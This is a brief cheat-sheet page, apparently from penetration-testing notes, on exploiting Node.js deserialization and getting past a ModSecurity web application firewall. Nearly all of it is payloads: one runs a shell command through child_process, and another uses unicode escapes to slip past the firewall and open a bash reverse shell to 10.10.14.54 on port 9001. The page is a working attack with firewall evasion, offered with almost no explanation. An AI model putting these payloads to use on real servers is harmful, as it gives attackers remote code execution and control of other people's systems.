Node.js Deserialization
Mod-security bypass
how to bypass : [change the payload to hexadecimal]
Basic explaination
Last updated
Last updated
{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}{"rce":"_$$ND_FUNC$$ //this func triggers the WAF{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.54/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}